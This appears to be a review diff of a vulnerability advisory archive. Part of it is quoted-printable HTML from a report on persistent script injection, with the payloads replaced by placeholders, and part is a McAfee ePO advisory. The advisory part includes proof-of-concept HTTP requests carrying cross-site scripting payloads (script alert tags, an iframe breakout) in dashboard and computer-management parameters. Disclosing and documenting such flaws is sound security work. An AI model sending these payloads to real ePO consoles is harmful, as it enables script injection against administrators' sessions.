<TD vAlign=top width="32%">
<P><STRONG>Resolution</STRONG></P>
<P>Resolved: </P></TD>
<TD vAlign=3Dtop width=3D"68%">
<TD vAlign=top width="68%">
=
[PERSISTENT INJECTED SCRIPT CODE!]</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD> </TD></TR>
<TR>
<TD>
<TABLE=20
style=3D"BORDER-BOTTOM: #000000 1px solid; =
<TABLE
style="BORDER-BOTTOM: #000000 1px solid; =
BORDER-LEFT: #000000 1px solid; BORDER-TOP: #000000 1px solid; =
BORDER-RIGHT: #000000 1px solid"=20
border=3D0 cellSpacing=3D10 cellPadding=3D8 =
width=3D"100%">
BORDER-RIGHT: #000000 1px solid"
border=0 cellSpacing=10 cellPadding=8 =
width="100%">
<TBODY>
<TR>
<TD vAlign=3Dtop width=3D"32%"><STRONG>Fault =
Report Notes=20
<TD vAlign=top width="32%"><STRONG>Fault =
Report Notes
</STRONG></TD>
<TD vAlign=3Dtop width=3D"68%">
<TD vAlign=top width="68%">
[PERSISTENT INJECTED SCRIPT CODE!]</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD> </TD></TR>
<TR>
<TD>
<TABLE=20
style=3D"BORDER-BOTTOM: #000000 1px solid; =
<TABLE
style="BORDER-BOTTOM: #000000 1px solid; =
BORDER-LEFT: #000000 1px solid; BORDER-TOP: #000000 1px solid; =
BORDER-RIGHT: #000000 1px solid"=20
border=3D0 cellSpacing=3D10 cellPadding=3D8 =
width=3D"100%">
BORDER-RIGHT: #000000 1px solid"
border=0 cellSpacing=10 cellPadding=8 =
width="100%">
<TBODY>
<TR>
<TD vAlign=3Dtop width=3D"32%"><STRONG>Order Notes =
<TD vAlign=top width="32%"><STRONG>Order Notes =
</STRONG></TD>
<TD vAlign=3Dtop width=3D"68%">
<TD vAlign=top width="68%">
[PERSISTENT INJECTED SCRIPT CODE!]</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD> </TD></TR>
<TR>
<TD> </TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD><IMG=20
<TD><IMG
=
src=3D"file:///C:/Documents%20and%20Settings/storm/Local%20Settings/Temp/=
vlabs_1x1.jpg"=20
width=3D1 height=3D150></TD>
<TD=20
vAlign=3Dtop> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></=
src="file:///C:/Documents%20and%20Settings/storm/Local%20Settings/Temp/=
vlabs_1x1.jpg"
width=1 height=150></TD>
<TD
vAlign=top> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></=
BODY></HTML>
...
@ -353,25 +353,25 @@ Content-Type: multipart/related;
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.6157
class=3Dstyle20><BR></SPAN></STRONG></DIV></TD>
<TD vAlign=3Dtop width=3D"50%">
<DIV align=3Dright>
<P><IMG=20
class=style20><BR></SPAN></STRONG></DIV></TD>
<TD vAlign=top width="50%">
<DIV align=right>
<P><IMG
=
src=3D""=20
width=3D323 height=3D99><BR><BR><STRONG>
src=""
width=323 height=99><BR><BR><STRONG>
[PERSISTENT INJECTED SCRIPT CODE!]</STRONG><BR>
[PERSISTENT INJECTED SCRIPT CODE!]
<P></P></DIV></TD></TR></TBODY></TABLE></DIV></TD></TR>
<TR>
<TD vAlign=3Dtop>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TD vAlign=top>
<TABLE border=0 cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD width=3D1><IMG=20
<TD width=1><IMG
=
src=3D""=20
width=3D1 height=3D450></TD>
src=""
width=1 height=450></TD>
Risk:
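Review bot: The quoted-printable cleanup in this section is only partial: `=3D` and `=20` are decoded on the new side, but the MIME soft line breaks (a bare `=` at the end of lines such as `style="BORDER-BOTTOM: #000000 1px solid; =` and the lone `=` lines preceding `[PERSISTENT INJECTED SCRIPT CODE!]`) and the `=A3` in `=A31.00` are kept as-is. The result is neither the original MHT encoding nor clean HTML, so anyone pasting the PoC markup gets stray `=` characters inside the `style` attribute and before the `src=` of the IMG tags. Either decode the whole body consistently (join the soft-break lines and map `=A3` to its iso-8859-1 character, which matches the declared charset) or leave the original encoding untouched so it can be decoded mechanically. Since the placeholder `[PERSISTENT INJECTED SCRIPT CODE!]` stands in for the actual payload, the section documents injection points rather than a reproducible exploit; a one-line note stating that, e.g. `<!-- placeholder: the injected payload is not included in this capture -->`, would help readers.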


@ -45,7 +45,7 @@ McAfee Solution:
Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013.
Item "b" has been addressed per Security Bulletin SB10043.
(https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043)
(https://kc.mcafee.com/corporate/index?page=content&id=SB10043)
@ -58,10 +58,10 @@ b. POST /console/createDashboardContainer.do HTTP/1.1
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
c. POST /console/createDashboardContainer.do HTTP/1.1
elementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30&
width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&filteringEnabled=3Dfalse&mo
nitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.sec
urity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard
elementId=customURL.dashboard.factory%3Ainstance&index=2&pageid=30&
width=1118&height=557&refreshInterval=5&refreshIntervalUnit=MIN&filteringEnabled=false&mo
nitorUrl=http%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.sec
urity.token=9BslgbJEv2JqQy3k&ajaxMode=standard
d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1